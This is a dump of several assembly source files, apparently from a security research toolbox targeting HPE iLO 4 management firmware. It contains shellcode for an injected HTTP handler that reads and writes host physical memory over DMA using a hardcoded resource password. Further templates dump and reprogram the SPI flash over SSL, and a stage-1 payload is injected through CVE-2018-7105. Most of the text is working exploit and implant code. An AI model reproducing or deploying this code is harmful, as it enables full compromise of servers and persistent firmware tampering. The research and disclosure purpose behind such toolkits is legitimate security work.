     [esp+4] error code, or a fake -1 pushed by the stub
   followed by the CPU-pushed eip/cs/eflags frame. */
generic_handle:
/* Save registers */
pusha
push %ss
push %ds
push %es
push %fs
push %gs
/* Prepare argument context_t* */
mov %esp, %eax
/* Get the interrupt number: 32 bytes of pusha + 5*4 bytes of
   segment pushes put the vector number at esp+52. */
mov 52(%esp), %ebx
/* Restore default DS to access interrupt_handler array */
mov $0x10, %ecx
movw %cx, %ds // WARNING : suppose that GDTR is correctly configured !!
/* Call the right handler */
lea interrupt_handlers, %edi
call *(%edi,%ebx,4)
pop %gs
pop %fs
pop %es
pop %ds
pop %ss
popa
/* Drop the vector number and (fake) error code before iret. */
add $8, %esp
iret
.align 16
/* Table of 16-byte-aligned entry stubs, one per vector: the IDT
   initialisation code can locate stub N at idt_switch + N*16.
   Vectors for which the CPU does not push an error code push a
   fake -1 first so that generic_handle always sees the same
   stack layout. */
idt_switch:
/* 0 #DE : Divide Error Exception N */
push $-1 /* fake error code */
push $0 /* Exception number */
jmp generic_handle
.align 16
/* 1 #DB : Debug Exception N */
push $-1
push $1
jmp generic_handle
.align 16
/* 2 NMI Interrupt N */
push $-1
push $2
jmp generic_handle
.align 16
/* 3 #BP : Breakpoint Exception N */
push $-1
push $3
jmp generic_handle
.align 16
/* 4 #OF : Overflow Exception N */
push $-1
push $4
jmp generic_handle
.align 16
/* 5 #BR : Bound Range exceeded exception N */
push $-1
push $5
jmp generic_handle
.align 16
/* 6 #UD : Invalid Opcode Exception N */
push $-1
push $6
jmp generic_handle
.align 16
/* 7 #NM : Device Not Available Exception N */
push $-1
push $7
jmp generic_handle
.align 16
/* 8 #DF : Double Fault Exception Y -- CPU pushes the error code */
push $8
jmp generic_handle
.align 16
/* 9 Coprocessor Segment Overrun N */
push $-1
push $9
jmp generic_handle
.align 16
/* 10 #TS : Invalid TSS Exception Y */
push $10
jmp generic_handle
.align 16
/* 11 #NP : Segment Not Present Y */
push $11
jmp generic_handle
.align 16
/* 12 #SS : Stack Fault Exception Y */
push $12
jmp generic_handle
.align 16
/* 13 #GP : General Protection Exception Y */
push $13
jmp generic_handle
.align 16
/* 14 #PF : Page Fault Exception Y */
push $14
jmp generic_handle
.align 16
/* 15 Reserved for Intel N */
push $-1
push $15
jmp generic_handle
.align 16
/* 16 #MF : x87 FPU Floating-Point Error N */
push $-1
push $16
jmp generic_handle
.align 16
/* 17 #AC : Alignment Check Exception Y */
push $17
jmp generic_handle
.align 16
/* 18 #MC : Machine-Check Exception N */
push $-1
push $18
jmp generic_handle
.align 16
/* 19 #XF : SIMD Floating-Point Exception N */
push $-1
push $19
jmp generic_handle
.align 16
|
airbus-seclab/ilo4_toolbox
| 12,288
|
scripts/iLO4/GET_handler.S
|
@ HTTP GET handler shellcode for iLO 4.
@ On entry (from the hooked dispatcher): R2 = request object,
@ R3 = connection object.  Copies the query string to scratch
@ storage, parses it as key=value pairs and dispatches on
@ act=dmp|ldmp|wmem.
@ Locals: [SP,#0xFC] = cursor into the copied query string,
@         [SP,#0x200] = current key, [SP,#0x220] = current value.
start:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x400
MOV R7, R2              @ R7 = request
MOV R6, R3              @ R6 = connection
MOV R1, #0x400
MOV R0, SP
BL bzero                @ clear the local frame
MOV R0, #8
BL memmap               @ map region 8 (host memory window)
MOV R0, R7
LDR R10, get_query_string
BLX R10                 @ R0 = query string, or 0
CMP R0, #0
BEQ error_400           @ no query string -> HTTP 400
MOV R2, #0x1000
MOV R1, R0
BL get_storage
ADD R0, R0, #0x2000
STR R0, [SP,#0xFC]      @ cursor = storage+0x2000
LDR R10, strncpy
BLX R10                 @ strncpy(storage+0x2000, query, 0x1000)
parsing:
MOV R2, #0xE0
STR R2, [SP,#0]         @ 5th arg: value buffer size
ADD R3, SP, #0x220      @ value buffer
MOV R2, #0x20           @ key buffer size
ADD R1, SP, #0x200      @ key buffer
LDR R0, [SP,#0xFC]
BL parse_qs
STR R0, [SP,#0xFC]      @ cursor advances to the next pair
@ Keys/values are matched by comparing their first 4 bytes,
@ loaded as a single little-endian word.
LDR R1, string_act
LDR R0, [SP, #0x200]
CMP R0, R1              @ key == "act" ?
BNE unknown_cmd
LDR R1, string_dmp
LDR R0, [SP, #0x220]
CMP R0, R1
BEQ cmd_dmp
LDR R1, string_ldmp
LDR R0, [SP, #0x220]
CMP R0, R1
BEQ cmd_ldmp
LDR R1, string_wmem
LDR R0, [SP, #0x220]
CMP R0, R1
BEQ cmd_wmem
B unknown_cmd
cmd_dmp:
BL check_host           @ host DMA only possible when host is up
CMP R0, #1
BNE host_down
LDR R1, [SP,#0xFC]      @ rest of the query string
MOV R0, R6
BL dmp
CMP R0, #1
BEQ error_cmd
B end
cmd_ldmp:
LDR R1, [SP,#0xFC]
MOV R0, R6
BL ldmp                 @ local (iLO) memory dump needs no host
CMP R0, #1
BEQ error_cmd
B end
cmd_wmem:
BL check_host
CMP R0, #1
BNE host_down
LDR R1, [SP,#0xFC]
MOV R0, R6
BL wmem
CMP R0, #1
BEQ error_cmd
B end
host_down:
MOV R2, #0xF            @ strlen("Host not ready!")
ADR R1, string_hostdown
MOV R0, R6
BL go_200
B end
error_cmd:
MOV R2, #0x10           @ strlen("Error in command")
ADR R1, string_errcmd
MOV R0, R6
BL go_200
B end
unknown_cmd:
MOV R2, #0xF            @ strlen("Unknown command")
ADR R1, string_unkcmd
MOV R0, R6
BL go_200
B end
error_400:
MOV R0, R6
BL go_400
end:
LDMDB R11, {R5-R11,SP,PC}
@ Absolute addresses of iLO firmware routines (version-specific).
get_query_string: .word 0x17AD8
strncpy: .word 0x17B26C0
@ Thunk so callers can simply BL bzero; R10 is used as scratch.
bzero:
LDR R10, bzero_fn
BX R10
bzero_fn: .word 0x1782FE4
@ Command keywords.  Each is 4-byte aligned so its first 4 bytes
@ can be loaded as one word for the comparisons above.
string_act: .string "act"
.align 4
string_dmp: .string "dmp"
.align 4
string_ldmp: .string "ldmp"
.align 4
string_wmem: .string "wmem"
.align 4
string_cmdin: .string "cmdin"
.align 4
string_cmdout: .string "cmdout"
.align 4
string_unkcmd: .string "Unknown command"
.align 4
string_errcmd: .string "Error in command"
.align 4
string_hostdown: .string "Host not ready!"
.align 4
@ parse_qs(cursor, key, keysz, value, valuesz): firmware query-string
@ parser; returns the cursor to the next pair (0 at end).
parse_qs:
LDR R10, parse_query_string
BX R10
parse_query_string: .word 0x6D100
@ go_200_headers(conn): set the HTTP status code stored at
@ conn+off_http_code to 200 and emit the response headers.
go_200_headers:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
MOV R6, R0
LDR R1, off_http_code
LDR R2, http_code_200
STR R2, [R1,R6]         @ *(conn + 0x2420) = 200
MOV R0, R6
LDR R10, send_headers
BLX R10
LDMDB R11, {R5-R11,SP,PC}
@ Tail-call thunks into the firmware HTTP layer.
go_200_close:
LDR R10, close_conn
BX R10
go_200_send:
LDR R10, send_content
BX R10
@ go_200(conn, buf, len): full 200 response with the given body.
go_200:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x10
MOV R6, R0
MOV R7, R1
MOV R8, R2
MOV R0, R6
BL go_200_headers
MOV R2, R8
MOV R1, R7
MOV R0, R6
BL go_200_send
MOV R0, R6
BL go_200_close
LDMDB R11, {R5-R11,SP,PC}
@ go_400(conn): 400 response with an empty body.
go_400:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
MOV R6, R0
LDR R1, off_http_code
LDR R2, http_code_400
STR R2, [R1,R6]
MOV R0, R6
LDR R10, send_empty_content
BLX R10
LDMDB R11, {R5-R11,SP,PC}
send_content: .word 0x16D90
send_headers: .word 0x16BBC
close_conn: .word 0x16DBC
send_empty_content: .word 0x16A2C
off_http_code: .word 0x2420     @ offset of the status code in conn
http_code_200: .word 200
http_code_400: .word 400
@ dmp(conn, query_cursor): parse hiaddr/loaddr/count parameters
@ (hex) from the remaining query string, then dump host memory.
@ Locals: [SP,#0xF8]=hiaddr, [SP,#0xF4]=loaddr, [SP,#0xF0]=count.
@ Returns 0 on success, 1 on bad parameters.
dmp:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x400
MOV R6, R0
MOV R7, R1
MOV R1, #0x400
MOV R0, SP
BL bzero
STR R7, [SP,#0xFC]      @ cursor
dmp_ploop:
LDR R0, [SP,#0xFC]
CMP R0, #0
BEQ end_ploop           @ no more pairs
MOV R2, #0xE0
STR R2, [SP,#0]
ADD R3, SP, #0x220      @ value
MOV R2, #0x20
ADD R1, SP, #0x200      @ key
BL parse_qs
STR R0, [SP,#0xFC]
@ Match the key by its packed first 4 bytes ("hiad"/"load"/"coun").
BL get_addrhistr
LDR R1, [SP, #0x200]
CMP R0, R1
BEQ get_addrhi
BL get_addrlostr
CMP R0, R1
BEQ get_addrlo
BL get_countstr
CMP R0, R1
BNE end_ploop           @ unknown key: stop parsing
get_count:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF0]
B dmp_ploop
get_addrhi:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF8]
B dmp_ploop
get_addrlo:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF4]
B dmp_ploop
end_ploop:
@ At least one of hiaddr/loaddr must be non-zero.
LDR R0, [SP, #0xF8]
CMP R0, #0
BNE check_size
LDR R0, [SP, #0xF4]
CMP R0, #0
BEQ err_dmp
check_size:
@ count must be non-zero and a multiple of 0x10000 (see get_mask).
LDR R1, [SP, #0xF0]
CMP R1, #0
BEQ err_dmp
BL get_mask
AND R0, R0, R1
CMP R0, #0
BNE err_dmp
do_dmp:
LDR R3, [SP, #0xF0]     @ count
LDR R2, [SP, #0xF8]     @ hiaddr
LDR R1, [SP, #0xF4]     @ loaddr
MOV R0, R6
BL dmp_host
MOV R0, #0
B end_dmp
err_dmp:
MOV R0, #1
end_dmp:
LDMDB R11, {R5-R11,SP,PC}
@ ldmp(conn, query_cursor): "local dump" -- parse loaddr/count and
@ send count bytes starting at loaddr of iLO's own address space
@ directly over the connection.  Returns 0 on success, 1 on error.
@ Locals: [SP,#0xF4]=loaddr, [SP,#0xF0]=count.
ldmp:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x400
MOV R6, R0
MOV R7, R1
MOV R1, #0x400
MOV R0, SP
BL bzero
STR R7, [SP,#0xFC]
ldmp_ploop:
LDR R0, [SP,#0xFC]
CMP R0, #0
BEQ end_ldmp_ploop
MOV R2, #0xE0
STR R2, [SP,#0]
ADD R3, SP, #0x220
MOV R2, #0x20
ADD R1, SP, #0x200
BL parse_qs
STR R0, [SP,#0xFC]
LDR R1, [SP, #0x200]    @ packed first 4 bytes of the key
BL get_addrlostr
CMP R0, R1
BEQ get_ldmp_addrlo
BL get_countstr
CMP R0, R1
BNE end_ldmp_ploop
get_ldmp_count:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF0]
B ldmp_ploop
get_ldmp_addrlo:
ADD R0, SP, #0x220
BL atoi16
STR R0, [SP, #0xF4]
B ldmp_ploop
end_ldmp_ploop:
LDR R0, [SP, #0xF4]
CMP R0, #0
BEQ err_ldmp            @ loaddr required
ldmp_check_size:
LDR R1, [SP, #0xF0]
CMP R1, #0
BEQ err_ldmp            @ count required
do_ldmp:
MOV R0, R6
BL go_200_headers
LDR R2, [SP, #0xF0]     @ len = count
LDR R1, [SP, #0xF4]     @ buf = loaddr (iLO virtual address)
MOV R0, R6
BL go_200_send
MOV R0, R6
BL go_200_close
MOV R0, #0
B end_ldmp
err_ldmp:
MOV R0, #1
end_ldmp:
LDMDB R11, {R5-R11,SP,PC}
@ wmem(conn, query_cursor): parse hiaddr/loaddr/data, base64-decode
@ the data into scratch storage and write it to host memory.
@ Values are parsed into the global storage buffer (they can be
@ large); keys into [SP,#0x100].
@ Locals: [SP,#0xF8]=hiaddr, [SP,#0xF4]=loaddr,
@         [SP,#0xF0]=decoded data length.
@ Returns 0 on success, 1 on bad parameters.
wmem:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x200
MOV R6, R0
MOV R7, R1
MOV R1, #0x200
MOV R0, SP
BL bzero
STR R7, [SP,#0xFC]
wmem_ploop:
LDR R0, [SP,#0xFC]
CMP R0, #0
BEQ end_wmemploop
MOV R2, #0x1000
STR R2, [SP,#0]         @ value buffer size
BL get_storage
MOV R3, R0              @ value buffer = storage
MOV R2, #0x20
ADD R1, SP, #0x100      @ key buffer
LDR R0, [SP,#0xFC]
BL parse_qs
STR R0, [SP,#0xFC]
BL get_addrhistr
LDR R1, [SP, #0x100]
CMP R0, R1
BEQ get_wmem_addrhi
BL get_addrlostr
CMP R0, R1
BEQ get_wmem_addrlo
BL get_datastr
CMP R0, R1
BNE end_wmemploop
get_data:
MOV R2, #0x1000
BL get_storage
ADD R1, R0, #0x1000     @ decode destination = storage+0x1000
BL b64_decode           @ R0 = decoded length (assumed; TODO confirm)
STR R0, [SP, #0xF0]
B wmem_ploop
get_wmem_addrhi:
BL get_storage          @ value text lives in storage
BL atoi16
STR R0, [SP, #0xF8]
B wmem_ploop
get_wmem_addrlo:
BL get_storage
BL atoi16
STR R0, [SP, #0xF4]
B wmem_ploop
end_wmemploop:
@ At least one of hiaddr/loaddr must be non-zero.
LDR R0, [SP, #0xF8]
CMP R0, #0
BNE check_wmem_size
LDR R0, [SP, #0xF4]
CMP R0, #0
BEQ err_wmem
check_wmem_size:
LDR R1, [SP, #0xF0]
CMP R1, #0
BEQ err_wmem            @ no data decoded
CMP R1, #0xffffffff
BEQ err_wmem            @ decode error sentinel
do_wmem:
LDR R3, [SP, #0xF0]     @ length
LDR R2, [SP, #0xF8]     @ hiaddr
LDR R1, [SP, #0xF4]     @ loaddr
MOV R0, R6
BL wmem_host
MOV R0, #0
B end_wmem
err_wmem:
MOV R0, #1
end_wmem:
LDMDB R11, {R5-R11,SP,PC}
@ Each get_*str helper returns, in R0, the first four bytes of its
@ keyword packed as a little-endian word (LDR on the string label);
@ that word is what the parsing loops compare keys against.
get_addrhistr:
LDR R0, string_addrhi
BX LR
string_addrhi: .string "hiaddr"
.align 4
get_addrlostr:
LDR R0, string_addrlo
BX LR
string_addrlo: .string "loaddr"
.align 4
get_countstr:
LDR R0, string_count
BX LR
string_count: .string "count"
.align 4
get_datastr:
LDR R0, string_data
BX LR
string_data: .string "data"
.align 4
@ Mask used to require count to be a multiple of 0x10000.
get_mask:
LDR R0, ffff
BX LR
ffff: .word 0xffff
@ atoi16(str) = strtoll(str, NULL, 16).
atoi16:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
MOV R2, #0x10           @ base 16
MOV R1, #0              @ endptr = NULL
LDR R10, strtoll
BLX R10
LDMDB R11, {R5-R11,SP,PC}
strtoll: .word 0x17B91F8
@ dmp_host(conn, loaddr, hiaddr, count): stream count bytes of host
@ physical memory (64-bit address hiaddr:loaddr) over the connection
@ in 0x10000-byte chunks.  For each chunk a PCI window register is
@ programmed so the MR81000 memory region at 0x81000000 maps the
@ target page, then CopyFromMemoryRegion pulls the data into scratch
@ storage and go_200_send ships it out.
@ Register roles: R6=conn, R7=loaddr, R8=hiaddr, R9=bytes left.
dmp_host:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x100
MOV R6, R0
MOV R7, R1
MOV R8, R2
MOV R9, R3
MOV R1, #0x100
MOV R0, SP
BL bzero
@ Acquire the MR81000 memory-region resource (needs the password).
BL get_passwd
MOV R2, R0
BL get_mr
MOV R1, R0
MOV R0, SP              @ [SP] receives the resource handle
BL RequestResource
ADD R2, SP, #0x8
ADD R1, SP, #0x4
LDR R0, [SP]
BL GetMemoryRegionAddresses
@ Acquire the SAWBASE semaphore guarding the PCI window.
MOV R2, #0
BL get_saw
MOV R1, R0
ADD R0, SP, #0x10
BL RequestResource
MOV R0, R6
BL go_200_headers
LDR R0, [SP, #0x10]
MOV R2, #0
MOV R1, R2
BL WaitForSemaphore
MOV R0, #2
STR R0, [SP, #0x14]     @ window-control byte placed in bits 31..24
dmp_host_loop:
@ Build the window register value from hiaddr:loaddr.
MOV R3, R8, LSL #8
ORR R2, R3, R7, LSR #24
LDRB R3, [SP, #0x14]
BIC R2, R2, #0xFF000000
ORR R2, R2, R3, LSL #24
BL get_pcireg
STR R2, [R0]            @ program the PCI window
BIC R2, R7, #0xFF000000
ADD R0, R2, #0x81000000 @ offset of the chunk inside MR81000
STR R0, [SP, #0xC]
MOV R3, #0x10000
BL get_storage
MOV R2, R0
LDR R1, [SP, #0xC]
LDR R0, [SP]
BL CopyFromMemoryRegion @ copy 0x10000 bytes into storage
MOV R2, #0x10000
BL get_storage
MOV R1, R0
MOV R0, R6
BL go_200_send          @ stream the chunk
SUBS R9, R9, #0x10000
CMP R9, #0
BLE dmp_host_end
ADD R7, R7, #0x10000    @ next chunk
B dmp_host_loop
dmp_host_end:
@ Release semaphore and both resources, then close the response.
LDR R0, [SP, #0x10]
BL ReleaseSemaphore
LDR R0, [SP, #0x10]
BL ReleaseResource
LDR R0, [SP]
BL ReleaseResource
MOV R0, R6
BL go_200_close
LDMDB R11, {R5-R11,SP,PC}
@ wmem_host(conn, loaddr, hiaddr, len): write len bytes (previously
@ base64-decoded into storage+0x1000 by wmem) to host physical
@ memory hiaddr:loaddr through the same PCI window / MR81000
@ mechanism as dmp_host, then echo the written data back as the
@ HTTP response.  Register roles: R6=conn, R7=loaddr, R8=hiaddr,
@ R9=len.
wmem_host:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
SUB SP, SP, #0x100
MOV R6, R0
MOV R7, R1
MOV R8, R2
MOV R9, R3
MOV R1, #0x100
MOV R0, SP
BL bzero
@ Acquire the MR81000 memory region and the SAWBASE semaphore.
BL get_passwd
MOV R2, R0
BL get_mr
MOV R1, R0
MOV R0, SP
BL RequestResource
ADD R2, SP, #0x8
ADD R1, SP, #0x4
LDR R0, [SP]
BL GetMemoryRegionAddresses
MOV R2, #0
BL get_saw
MOV R1, R0
ADD R0, SP, #0x10
BL RequestResource
LDR R0, [SP, #0x10]
MOV R2, #0
MOV R1, R2
BL WaitForSemaphore
MOV R0, #2
STR R0, [SP, #0x14]
@ Program the PCI window for hiaddr:loaddr (same encoding as
@ dmp_host_loop).
MOV R3, R8, LSL #8
ORR R2, R3, R7, LSR #24
LDRB R3, [SP, #0x14]
BIC R2, R2, #0xFF000000
ORR R2, R2, R3, LSL #24
BL get_pcireg
STR R2, [R0]
BIC R2, R7, #0xFF000000
ADD R0, R2, #0x81000000
STR R0, [SP, #0xC]
MOV R3, R9              @ length
BL get_storage
ADD R2, R0, #0x1000     @ source = decoded data at storage+0x1000
LDR R1, [SP, #0xC]
LDR R0, [SP]
BL CopyToMemoryRegion
LDR R0, [SP, #0x10]
BL ReleaseSemaphore
LDR R0, [SP, #0x10]
BL ReleaseResource
LDR R0, [SP]
BL ReleaseResource
@ Echo the written bytes back in a 200 response.
MOV R0, R6
BL go_200_headers
MOV R2, R9
BL get_storage
ADD R1, R0, #0x1000
MOV R0, R6
BL go_200_send
MOV R0, R6
BL go_200_close
LDMDB R11, {R5-R11,SP,PC}
@ check_host(): probe the host status via a PCI register.
@ Returns 0 if bit 24 is clear (host not up), -1 if bit 25 is set,
@ 1 otherwise (host ready).
check_host:
MOV R12, SP
STMFD SP!, {R5-R11,R12,LR,PC}
SUB R11, R12, #4
LDR R2, host_pcireg
LDR R1, [R2]
ANDS R0, R1, #0x1000000 @ R0 = 0 (and return) if bit 24 clear
BEQ check_host_end
TST R1, #0x2000000
MOVNE R0, #0xFFFFFFFF
MOVEQ R0, #1
check_host_end:
LDMDB R11, {R5-R11,SP,PC}
host_pcireg: .word 0x1F02070
@ Address of the PCI window control register used by dmp_host /
@ wmem_host.
get_pcireg:
LDR R0, pcireg
BX LR
pcireg: .word 0x1F02060
@ Thunks into iLO firmware resource/semaphore/memory-region APIs.
RequestResource:
LDR R10, RequestResource_fn
BX R10
RequestResource_fn: .word 0x17A3948
ReleaseResource:
LDR R10, ReleaseResource_fn
BX R10
ReleaseResource_fn: .word 0x17808FC
WaitForSemaphore:
LDR R10, WaitForSemaphore_fn
BX R10
WaitForSemaphore_fn: .word 0x1781190
ReleaseSemaphore:
LDR R10, ReleaseSemaphore_fn
BX R10
ReleaseSemaphore_fn: .word 0x1781B54
GetMemoryRegionAddresses:
LDR R10, GetMemoryRegionAddresses_fn
BX R10
GetMemoryRegionAddresses_fn: .word 0x17829A0
CopyFromMemoryRegion:
LDR R10, CopyFromMemoryRegion_fn
BX R10
CopyFromMemoryRegion_fn: .word 0x178284C
CopyToMemoryRegion:
LDR R10, CopyToMemoryRegion_fn
BX R10
CopyToMemoryRegion_fn: .word 0x1782818
memmap:
LDR R10, memmap_fn
BX R10
memmap_fn: .word 0x49718
b64_decode:
LDR R10, b64_decode_fn
BX R10
b64_decode_fn: .word 0x1C250F8
@ Resource names / credentials used by RequestResource.
get_mr:
ADR R0, mr
BX LR
mr: .string "MR81000"
.align 4
get_saw:
ADR R0, saw
BX LR
saw: .string "SAWBASE"
.align 4
get_passwd:
ADR R0, passwd
BX LR
passwd: .string "!systempassword"
.align 4
@ Address of a large scratch buffer in iLO memory.
get_storage:
LDR R0, storage
BX LR
storage: .word 0x2f1934
|
airbus-seclab/ilo4_toolbox
| 2,343
|
scripts/iLO4/exploits/flash_write_page.S
|
@ flash_write_page.S -- shellcode template (the 0x%x words are
@ filled in by a generator script) that reprograms the SPI flash.
@ Protocol over the SSL channel (handle in R7):
@   send "RDY", then per 0x10000-byte page: receive the page data
@   (acknowledging each SSL_Read with the byte count), erase the
@   page (SPI command 0xD8) and program it in 0x100-byte writes
@   (SPI command 0x02) through the "SpiService" VCom call.
@ R8 = flash offset of the current page, R6 = bytes received /
@ bytes written within the page.
start:
PUSH {R5,R6,R8,LR}
SUB SP, SP, #4
LDR R0, wbuff
LDR R1, rdy
STR R1, [R0]            @ *wbuff = "RDY"
LDR R3, SSL_Write
MOV R2, #0x4
LDR R1, wbuff
MOV R0, R7
BLX R3
MOV R8, #0
do_page:
MOV R6, #0
get_data:
@ Read page bytes into wbuff+0x1000+R6 and ack the count.
LDR R3, SSL_Read
LDR R2, page_size
LDR R1, wbuff
MOV R5, #0x1000
ADD R1, R5
ADD R1, R6
MOV R0, R7
BLX R3
ADD R6, R0
LDR R1, wbuff
STR R0, [R1]
LDR R3, SSL_Write
MOV R2, #0x8
LDR R1, wbuff
MOV R0, R7
BLX R3
LDR R0, page_size
CMP R6, R0
BNE get_data            @ loop until a full page is buffered
erase:
@ Build the SpiService request at wbuff+off: target address,
@ chip select, SPI opcode 0xD8 (sector erase).
LDR R3, wbuff
LDR R0, off
ADD R3, R3, R0
LDR R0, addr
ADD R0, R8
STR R0, [R3]
MOV R1, #0
STR R1, [R3, #4]
LDR R2, chip
STRB R2, [R3, #9]
ADD R3, R3, #8
MOV R2, #0
STRB R2, [R3, #3]
MOV R2, #0xD8
STRB R2, [R3, #2]
SUB R3, R3, #8
MOV R1, #0xEE
STRB R1, [R3, #0x110]
MOV R0, #1
STRB R0, [R3, #0x111]
LDR R5, VComClientSync_Call
MOV R1, R3
LDR R2, insz
LDR R3, wbuff
LDR R0, off
STR R0, [SP]
ADR R0, svc_name
BLX R5                  @ VComClientSync_Call("SpiService", req, ...)
MOV R6, #0
wloop:
@ Program the page 0x100 bytes at a time (SPI opcode 0x02).
LDR R3, wbuff
LDR R0, off
ADD R3, R3, R0
LDR R0, addr
ADD R0, R6
ADD R0, R8
STR R0, [R3]
MOV R1, #0x100
STR R1, [R3, #4]
LDR R2, chip
STRB R2, [R3, #9]
ADD R3, R3, #8
MOV R2, #0
STRB R2, [R3, #3]
MOV R2, #0x2
STRB R2, [R3, #2]
SUB R3, R3, #8
MOV R1, #0xEE
STRB R1, [R3, #0x110]
MOV R0, #1
STRB R0, [R3, #0x111]
MOV R5, R3
@ memcpy(req+8+5, wbuff+0x1000+R6, 0x100): payload into the request.
MOV R2, #0x100
LDR R1, wbuff
MOV R3, #0x1000
ADD R1, R3
ADD R1, R6
MOV R0, R5
ADD R0, #8
ADD R0, #5
LDR R3, memcpy
BLX R3
MOV R1, R5
LDR R5, VComClientSync_Call
LDR R2, insz
LDR R3, wbuff
LDR R0, off
STR R0, [SP]
ADR R0, svc_name
BLX R5
ADD R6, #0x100
LDR R0, page_size
CMP R6, R0
BNE wloop
LDR R0, page_size
ADD R8, R0              @ next page
LDR R0, memcount
CMP R8, R0
BNE do_page
theend:
@ Signal end of transfer and return the magic status -257.
LDR R0, wbuff
LDR R1, eot
STR R1, [R0]
LDR R3, SSL_Write
MOV R2, #0x8
LDR R1, wbuff
MOV R0, R7
BLX R3
ADD SP, SP, #4
MOV R0, -257            @ NOTE(review): immediate without '#'; relies on GAS accepting it -- confirm assembler
POP {R5,R6,R8,LR}
BX LR
@ Patched-in addresses and parameters (filled by the generator).
wbuff: .word 0x%x
SSL_Write: .word 0x%x
SSL_Read: .word 0x%x
wsize: .word 0x818
off: .word 0x408
insz: .word 0x114
addr: .word 0x%x
memcount: .word 0x%x
chip: .word 0x%x
VComClientSync_Call: .word 0x%x
memcpy: .word 0x%x
page_size: .word 0x10000
svc_name: .string "SpiService"
.align
eot: .string "EOT"
.align
rdy: .string "RDY"
.align
final: .word 0x41414141
|
airbus-seclab/ilo4_toolbox
| 1,182
|
scripts/iLO4/exploits/flash_read.S
|
@ flash_read.S -- shellcode template (0x%x words are patched in by
@ a generator script) that dumps the SPI flash: reads memcount
@ bytes in 0x400-byte chunks via the "SpiService" VCom call (SPI
@ fast-read opcode 0x0B) and streams each chunk over the SSL
@ channel whose handle is in R7.
start:
PUSH {R5,R6,LR}
SUB SP, SP, #4
loop:
@ Build the SpiService request at wbuff+off: address, length
@ 0x400, chip select, opcode 0x0B (fast read).
LDR R3, wbuff
LDR R0, off
ADD R3, R3, R0
LDR R0, addr
STR R0, [R3]
MOV R1, #0x400
STR R1, [R3, #4]
LDR R2, chip
STRB R2, [R3, #9]
ADD R3, R3, #8
MOV R2, #1
STRB R2, [R3, #3]
MOV R2, #0xB
STRB R2, [R3, #2]
SUB R3, R3, #8
MOV R1, #0xEE
STRB R1, [R3, #0x110]
STRB R0, [R3, #0x111]   @ NOTE(review): stores low byte of addr; the write variant stores #1 here -- confirm intended
MOV R6, R3
LDR R5, VComClientSync_Call
MOV R1, R6
LDR R2, insz
LDR R3, wbuff
LDR R0, off
STR R0, [SP]
ADR R0, svc_name
BLX R5                  @ VComClientSync_Call("SpiService", req, ...)
LDR R3, SSL_Write
LDR R2, wsize
LDR R1, wbuff
MOV R0, R7
BLX R3                  @ ship the chunk
@ Advance addr by 0x400 and decrement memcount in place
@ (self-modifying data words).
LDR R0, addr
ADD R0, #0x400
ADR R1, addr
STR R0, [R1]
LDR R0, memcount
SUB R0, #0x400
ADR R1, memcount
STR R0, [R1]
CMP R0, #0
BNE loop
theend:
@ Signal end of transfer and return the magic status -257.
LDR R0, wbuff
LDR R1, eot
STR R1, [R0]
LDR R3, SSL_Write
MOV R2, #0x4
LDR R1, wbuff
MOV R0, R7
BLX R3
ADD SP, SP, #4
MOV R0, -257            @ NOTE(review): immediate without '#'; relies on GAS accepting it -- confirm assembler
POP {R5,R6,LR}
BX LR
@ Patched-in addresses and parameters (filled by the generator).
wbuff: .word 0x%x
SSL_Write: .word 0x%x
wsize: .word 0x818
off: .word 0x408
insz: .word 0x114
addr: .word 0x%x
memcount: .word 0x%x
chip: .word 0x%x
VComClientSync_Call: .word 0x%x
svc_name: .string "SpiService"
.align
eot: .string "EOT"
.align
final: .word 0x41414141
|
airbus-seclab/ilo4_toolbox
| 4,432
|
scripts/iLO4/exploits/payloads_for_cli/stage1.S
|
/* Stage 1 payload written in ConAppCLI memory using CVE-2018-7105
* Only 216 bytes per "segment" are allowed, from 0x28, to prevent 0x25 from
* being in an address (chr(0x25) = '%')
*
* Compile in a standalone fashion using:
arm-none-eabi-gcc -march=armv5 -c -fPIC -nostdlib -ffreestanding stage1.S -o stage1_ilo4_250.o \
-DADDR_get_CLI_session_ptr=0x21e24 \
-DADDR_CLI_printf=0x12f50 \
-DADDR_libc_malloc=0x17B85E8 \
-DADDR_libc_free=0x17B86F4
arm-none-eabi-objcopy -j .shcode -O binary stage1_ilo4_250.o stage1_ilo4_250.bin
*/
.section .shcode, "ax", %progbits
.arm
.align 2
/* Use 256-byte segments, with 26..ff in each segment.
 * They are the only valid addresses,
 * and in fact 0x28 is used to keep 4-byte alignment.
 */
FIRST_SEGMENT:
.zero 0x28
/* Stage-1 entry point, invoked as a CLI command handler:
 * r0 = CLI session ID.  Dispatches on the first char of args[1]
 * (a/f/w/x) with an address/size operand decoded from the rest of
 * the argument. */
_start:
/* In ARM asm, fp=r11, ip=r12 */
mov ip, sp
push {r5, r6, r7, r8, r9, r10, fp, ip, lr, pc}
sub fp, ip, #4 /* fp = pointer to saved pc */
mov r6, r0 /* save arg0 = CLI session ID */
ldr r7, [pc, #(get_CLI_session_ptr - . - 8)]
blx r7
mov r5, r0
/* From now on, on iLO 4 v2.50:
 * - r4 = Thread-Local structure for glibc
 * - r5 = Pointer to CLI Session info
 * offset 0x164 = array of 16 arguments, 256 chars each
 * 0x164..263 = CLI command name
 * 0x264..363 = first arg
 * 0x364..464 = second arg
 * ...
